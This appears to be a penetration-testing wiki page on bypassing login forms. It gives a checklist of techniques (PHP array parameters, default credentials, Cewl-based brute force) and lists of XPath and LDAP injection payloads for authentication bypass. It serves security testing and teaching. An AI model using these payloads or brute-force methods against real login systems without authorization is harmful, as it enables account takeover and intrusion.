| .. | ||
| README.md | ||
| sql-login-bypass.md | ||
Login Bypass
Bypass regular login
If you find a login page, here you can find some techniques to try to bypass it:
- Check for comments inside the page
scroll down and to the right? - Check if you can directly access the restricted pages
- Check to not send the parameters
do not send any or only 1 - Check the PHP comparisons error: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b
- Check credentials:
- Default credentials ****of the technology/platform used
- Common combinations
root, admin, password, name of the tech, default user with one of these passwords. - Create a dictionary using Cewl, add the default username and password
if there isand try to brute-force it using all the words as usernames and password - Brute-force using a bigger dictionary (Brute force)
SQL Injection authentication bypass
Here you can find several tricks to bypass the login via SQL injections.
In the following page you can find a custom list to try to bypass login via SQL Injections:
{% page-ref page="sql-login-bypass.md" %}
No SQL Injection authentication bypass
Here you can find several tricks to bypass the login via No SQL Injections.****
As the NoSQL Injections requires to change the parameters value, you will need to test them manually.
XPath Injection authentication bypass
Here you can find several tricks to bypass the login via XPath Injection.****
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
LDAP Injection authentication bypass
Here you can find several tricks to bypass the login via LDAP Injection.****
*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|